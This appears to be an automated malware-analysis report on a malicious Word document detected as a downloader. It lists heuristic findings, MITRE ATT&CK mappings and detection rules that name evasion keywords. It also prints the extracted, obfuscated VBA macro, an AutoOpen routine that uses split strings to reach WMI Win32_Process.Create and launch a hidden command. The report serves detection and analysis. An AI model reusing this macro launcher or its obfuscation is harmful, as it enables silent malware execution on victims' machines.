MALICIOUS
342
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains a VBA macro with an AutoOpen subroutine that uses GetObject to instantiate WMI and then calls the Win32_Process.Create method. This indicates an attempt to download and execute a second-stage payload. The obfuscation technique of splitting keywords like 'winmgmts' is also present. The ClamAV detection further supports its malicious nature.
Heuristics 9
-
ClamAV: Doc.Downloader.Smpowloadbb-6962908-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Smpowloadbb-6962908-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3847 bytes |
SHA-256: fa896c4b2cc2a6d2f15b0049f8375cc35940898eeef0122809f0aa29d3152021 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "i863829"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "D_53_4"
Attribute VB_Base = "0{BD412974-589B-41DE-9E8D-DED578662413}{C5CE0973-DD7D-4CA2-B3F7-6A5C417EF5A7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "K_6600"
Attribute VB_Name = "b3_7780"
Attribute VB_Name = "K151838"
Attribute VB_Name = "A03099"
Attribute VB_Name = "z830892"
Attribute VB_Base = "0{28FEAFA6-8038-4B90-BEFA-5A949EBC548B}{10BC9832-4984-4E6A-B251-AE888253955D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "z08489"
Function q_1428(X31543)
While D663266 And 542280134
Wend
While s38582 And 263724980
Wend
While E1531_3 And 289212711
Wend
Set q_1428 = CVar(X31543)
While j70_716 And 838866411
Wend
While F9_99117 And 401421149
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While K24_3803 And 327086175
Wend
While b98_725 And 713465407
Wend
While s_867071 And 391075274
Wend
Call H20707
While G63637 And 758585543
Wend
While n26197 And 426985752
Wend
End Sub
Attribute VB_Name = "L870553"
Function H20707()
On Error Resume Next
While N0344300 And 309763873
Wend
While m98929 And 849564546
Wend
E81_8536 = D_53_4.D80924 + z830892.j821_2 + D_53_4.D80924.ControlTipText + z830892.Q8_745 + D_53_4.D80924.PasswordChar + D_53_4.D80924.PasswordChar + z830892.N1351545 + D_53_4.D80924.PasswordChar + D_53_4.D80924 + z830892.l425616 + D_53_4.D80924.ControlSource + z830892.h00257 + D_53_4.D80924.PasswordChar
While L622_162 And 820317213
Wend
While G94__714 And 690061733
Wend
Set b7967401 = q_1428(GetObject("win" + "mgmt" + "s:Wi" + "n32_Pr" + "ocess"))
While w540870 And 531303715
Wend
While V__44936 And 353747031
Wend
b7967401.Create m68_410_ + E81_8536 + v_54_5, t30132, r568_504, r8698417
While N88_9_ And 299830282
Wend
While z131121 And 400990066
Wend
While z8961_04 And 37711776
Wend
End Function
Attribute VB_Name = "t41371_"
Public Function r568_504()
While s52951_0 And 383703667
Wend
While w7038557 And 587640542
Wend
Set r568_504 = q_1428(GetObject("win" + "mgmt" + "s:Wi" + "n32_Pr" + "ocess" + "S" + "tartup"))
While O34141 And 416378640
Wend
While I879430 And 319883281
Wend
While k716_31 And 605714939
Wend
s9767939 = vbError - vbError
While i01_03 And 102268801
Wend
While R_88_203 And 998218258
Wend
While L_585032 And 625899539
Wend
With r568_504
While A68_882 And 84141301
Wend
While p6_835 And 429035145
Wend
. _
ShowWindow = s9767939 + s9767939 + s9767939 + s9767939 + s9767939 + s9767939 + s9767939
While T619943 And 717754346
Wend
While l433_173 And 847932028
Wend
While v4708815 And 387691639
Wend
End With
While D3554897 And 229706448
Wend
While T890437 And 489379582
Wend
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.